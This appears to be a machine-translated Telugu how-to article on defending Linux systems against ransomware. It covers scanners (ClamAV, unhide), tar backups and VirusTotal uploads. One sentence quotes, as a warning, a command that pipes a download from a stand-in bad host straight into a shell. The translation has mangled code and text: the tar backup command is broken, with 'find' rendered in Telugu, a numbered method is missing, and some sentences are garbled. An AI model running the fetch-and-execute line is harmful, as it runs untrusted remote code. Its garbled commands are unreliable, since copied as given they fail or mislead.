ఈ రోజు నెట్వర్క్ భద్రత ప్రపంచంలో రాన్సమ్వేర్ మరింత ప్రమాదకరమైన సమస్య. మీ డేటాను ఎవరైనా బందీగా ఉంచవచ్చని అనుకోవడం భయంగా ఉంది. కొన్ని ransomware అంటువ్యాధులు ఒక నిర్దిష్ట వాల్యూమ్లో అన్ని డేటాను గుప్తీకరిస్తాయి మరియు దాని వెనుక ఉన్న వ్యక్తులు చెప్పిన డేటాను అన్లాక్ చేయడానికి అవసరమైన కీని విడుదల చేయడానికి అంగీకరించే ముందు కొంత డబ్బును డిమాండ్ చేస్తారు. ఇది ముఖ్యంగా వారి డేటాలో ఎక్కువ డబ్బు పెట్టుబడి పెట్టే వ్యక్తుల గురించి. అయినప్పటికీ, Linux వినియోగదారులకు ఒక చిన్న శుభవార్త ఉంది.
చాలా సందర్భాల్లో, ransomware కోడ్ వినియోగదారు యొక్క హోమ్ డైరెక్టరీ కంటే మరేదైనా నియంత్రణ పొందడం కష్టం. ఈ ప్రోగ్రామ్లకు మొత్తం ఇన్స్టాల్ను ట్రాష్ చేయడానికి అనుమతులు లేవు. అందువల్లనే ఆపరేటర్లకు ఎల్లప్పుడూ రూట్ యాక్సెస్ ఉన్న సర్వర్లలో లైనక్స్ ransomware ఎక్కువ సమస్య. రాన్సమ్వేర్ లైనక్స్ వినియోగదారులకు చాలా సమస్యగా ఉండకూడదు మరియు ఇది మీకు జరగకుండా నిరోధించడానికి అనేక చర్యలు ఉన్నాయి.
విధానం 1: బాష్క్రిప్ట్ తరహా దాడులకు వ్యతిరేకంగా డిఫెండింగ్
బేసిక్రిప్ట్ అనేది ఈ రకమైన హానికరమైన కోడ్తో సర్వర్ నిర్మాణాలను సంక్రమించడం సాధ్యమని రుజువు చేసిన ransomware యొక్క కాన్సెప్ట్ పీస్ యొక్క రుజువు. ఇది Linux ransomware ప్యాకేజీలు ఎలా ఉంటుందో బేస్లైన్ను అందిస్తుంది. అవి ప్రస్తుతం అసాధారణమైనవి అయినప్పటికీ, ఇతర ప్లాట్ఫారమ్ల సర్వర్ నిర్వాహకుల కోసం అదే రకమైన ఇంగితజ్ఞానం నివారణ చర్యలు ఇక్కడ కూడా పనిచేస్తాయి. సమస్య ఏమిటంటే, సంస్థ-స్థాయి పరిసరాలలో హోస్ట్ సిస్టమ్ను ఉపయోగించి పెద్ద సంఖ్యలో వేర్వేరు వ్యక్తులు ఉండవచ్చు.
మీరు మెయిల్ సర్వర్ను నడుపుతుంటే, ప్రజలను అవివేకపు పనులు చేయకుండా ఉంచడం చాలా కష్టం. ప్రతి ఒక్కరూ తమకు ఖచ్చితంగా తెలియని జోడింపులను తెరవవద్దని గుర్తు చేయడానికి మీ వంతు కృషి చేయండి మరియు మాల్వేర్ ఎల్లప్పుడూ సందేహాస్పదమైన ప్రతిదాన్ని స్కాన్ చేస్తుంది. ఈ రకమైన దాడులను నివారించడానికి నిజంగా సహాయపడే మరొక విషయం ఏమిటంటే, మీరు wget తో బైనరీలను ఎలా ఇన్స్టాల్ చేస్తారో చూడటం. సహజంగానే మీ మెయిల్ సర్వర్కు డెస్క్టాప్ వాతావరణం పూర్తిగా ఉండకపోవచ్చు మరియు మీరు వచ్చే ప్యాకేజీలను నిర్వహించడానికి wget, apt-get, yum లేదా pacman ను ఉపయోగించవచ్చు. ఈ ఇన్స్టాలేషన్లలో ఏ రిపోజిటరీలను ఉపయోగిస్తున్నారో చూడటం చాలా ముఖ్యం. కొన్నిసార్లు మీరు wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, లేదా అది షెల్ లిపి లోపల ఉండవచ్చు. రెండు విధాలుగా, ఆ రిపోజిటరీ ఏమిటో మీకు తెలియకపోతే దాన్ని అమలు చేయవద్దు.
విధానం 2: స్కానర్ ప్యాకేజీని వ్యవస్థాపించడం
ఓపెన్ సోర్స్ మాల్వేర్ స్కానింగ్ టెక్నాలజీ యొక్క అనేక భాగాలు ఉన్నాయి. ClamAV చాలా ప్రసిద్ది చెందింది మరియు మీరు దీన్ని ఉపయోగించడం ద్వారా చాలా సముచితమైన ఆధారిత పంపిణీలలో దీన్ని ఇన్స్టాల్ చేయవచ్చు:
sudo apt-get install clamav
ఇది వ్యవస్థాపించబడినప్పుడు, మనిషి క్లామావ్ సాధారణ భాషలో వాడకాన్ని వివరించాలి. ఇది సోకిన ఫైల్లను స్కాన్ చేసి తొలగించగలదని గుర్తుంచుకోండి, ఇది వాస్తవానికి ఫైల్ నుండి అంటు కోడ్ను తొలగించదు. ఇది అన్ని లేదా ఏమీ పరిస్థితి.
మీకు తెలియని రెండవ స్కానర్ ఉంది, కానీ దాచిన ప్రక్రియలు మిమ్మల్ని భయపెడితే అది ఉపయోగపడుతుంది. మళ్ళీ మీరు సముచిత-ఆధారిత పంపిణీని ఉపయోగిస్తుంటే, అన్హైడ్ స్కానర్ను ఇన్స్టాల్ చేయడానికి ఈ ఆదేశాన్ని జారీ చేయండి:
sudo apt-get install unhide
ఇది వ్యవస్థాపించబడినప్పుడు, టైప్ చేయండి:
sudo unhide sys
ఏదైనా దాచిన ప్రక్రియల కోసం ఇది మీ సిస్టమ్ యొక్క పూర్తి స్కాన్ చేస్తుంది.
విధానం 4: శుభ్రమైన బ్యాకప్లను చేతిలో ఉంచడం
ప్రతిఒక్కరూ ఎల్లప్పుడూ బ్యాకప్లను తయారు చేసుకోవాలి కాబట్టి ఇది కూడా సమస్య కాదు, మంచి బ్యాకప్లు కలిగి ఉండటం వల్ల ransomware ను తక్షణమే జాప్ చేయవచ్చు. లైనక్స్ ప్లాట్ఫామ్లో చాలా తక్కువ ransomware ఉంది, వెబ్ డెవలప్మెంట్ ప్లాట్ఫామ్లకు ప్రత్యేకమైన పొడిగింపులతో ఫైల్లను దాడి చేస్తుంది. దీని అర్థం మీరు టన్ను .php, .xml లేదా .js కోడ్ చుట్టూ కూర్చుని ఉంటే, మీరు దీన్ని ప్రత్యేకంగా బ్యాకప్ చేయాలనుకుంటున్నారు. ఈ క్రింది కోడ్ పంక్తిని పరిగణించండి:
tar -cf backups.tar $ (-name “* .ruby” -or -name “* .html” ను కనుగొనండి)
ఇది ఫైల్ నిర్మాణంలో .ruby మరియు .html పొడిగింపులతో ప్రతి ఫైల్ యొక్క పెద్ద టేప్ ఆర్కైవ్ ఫైల్ను సృష్టించాలి. వెలికితీత కోసం దానిని వేరే తాత్కాలిక ఉప డైరెక్టరీకి తరలించవచ్చు, అది సృష్టించడం సరిగ్గా పనిచేస్తుందని నిర్ధారించుకోండి.
ఈ టేప్ ఆర్కైవ్ బాహ్య వాల్యూమ్కు తరలించబడవచ్చు. అలా చేయడానికి ముందు మీరు .bz2, .gz లేదా .xv కుదింపును ఉపయోగించవచ్చు. మీరు రెండు వేర్వేరు వాల్యూమ్లకు కాపీ చేయడం ద్వారా అద్దాల బ్యాకప్లను సృష్టించాలనుకోవచ్చు.
విధానం 5: వెబ్ ఆధారిత స్కానర్లను ఉపయోగించడం
ఉపయోగకరమైన సాఫ్ట్వేర్ను కలిగి ఉంటానని హామీ ఇచ్చే సైట్ నుండి మీరు RPM లేదా DEB ప్యాకేజీని డౌన్లోడ్ చేసుకోవచ్చు. సాఫ్ట్వేర్ 7z లేదా కంప్రెస్డ్ తారు ఫైళ్ళ ద్వారా కూడా పంపిణీ చేయబడుతుంది. మొబైల్ వినియోగదారులు APK ఆకృతిలో Android ప్యాకేజీలను కూడా స్వీకరించవచ్చు. మీ బ్రౌజర్లోని సాధనంతో వీటిని స్కాన్ చేయడం సులభం. దీన్ని https://www.virustotal.com/ కు సూచించండి మరియు పేజీ లోడ్ అయిన తర్వాత “ఫైల్ని ఎంచుకోండి” బటన్ను నొక్కండి. మీరు అప్లోడ్ చేయడానికి ముందు, ఇది పబ్లిక్ సర్వర్ అని గుర్తుంచుకోండి. ఇది ఆల్ఫాబెట్ ఇంక్ చేత సురక్షితంగా మరియు నడుస్తున్నప్పుడు, ఇది ఫైల్లను బహిరంగంగా బదిలీ చేస్తుంది, ఇది కొన్ని సూపర్-సురక్షిత వాతావరణాలలో సమస్య కావచ్చు. ఇది 128 MB ఫైళ్ళకు కూడా పరిమితం చేయబడింది.
పైకి వచ్చే పెట్టెలో మీ ఫైల్ను ఎంచుకుని, ఓపెన్ ఎంచుకోండి. బాక్స్ అదృశ్యమైన తర్వాత ఫైల్ పేరు బటన్ పక్కన ఉన్న పంక్తిలో కనిపిస్తుంది.
పెద్ద నీలంపై క్లిక్ చేయండి “దీన్ని స్కాన్ చేయండి!” బటన్. సిస్టమ్ మీ ఫైల్ను అప్లోడ్ చేస్తుందని సూచించే మరొక పెట్టెను మీరు చూస్తారు.
ఎవరైనా ఇప్పటికే ఫైల్ను ముందే తనిఖీ చేస్తే, అది మునుపటి నివేదిక గురించి మీకు తెలియజేస్తుంది. ఇది SHA256 మొత్తం ఆధారంగా దీన్ని గుర్తిస్తుంది, ఇది మీరు ఉపయోగించిన అదే Linux కమాండ్ లైన్ సాధనాల మాదిరిగానే పనిచేస్తుంది. కాకపోతే, ఇది 53 వేర్వేరు స్కానింగ్ ప్రోగ్రామ్లతో పూర్తి స్కాన్ను అమలు చేస్తుంది. ఫైల్ రన్ అయినప్పుడు వాటిలో కొన్ని సమయం ముగియవచ్చు మరియు ఈ ఫలితాలను సురక్షితంగా విస్మరించవచ్చు.
కొన్ని ప్రోగ్రామ్లు ఇతరులకన్నా భిన్నమైన ఫలితాలను ఇవ్వగలవు, కాబట్టి ఈ సిస్టమ్తో తప్పుడు పాజిటివ్లను కలుపుకోవడం సులభం. ఉత్తమ భాగం ఏమిటంటే ఇది వేర్వేరు ప్లాట్ఫారమ్ల మధ్య పనిచేస్తుంది, ఇది మీరు వేర్వేరు పరికరాల్లో ఏ పంపిణీని కలిగి ఉన్నా సమానంగా ఆకర్షణీయంగా ఉంటుంది. ఇది Android వంటి మొబైల్ పంపిణీల నుండి కూడా బాగా పనిచేస్తుంది, అందువల్ల APK ప్యాకేజీలను ఉపయోగించే ముందు వాటిని పరిశీలించడానికి ఇది ఒక గొప్ప మార్గం.
4 నిమిషాలు చదవండి
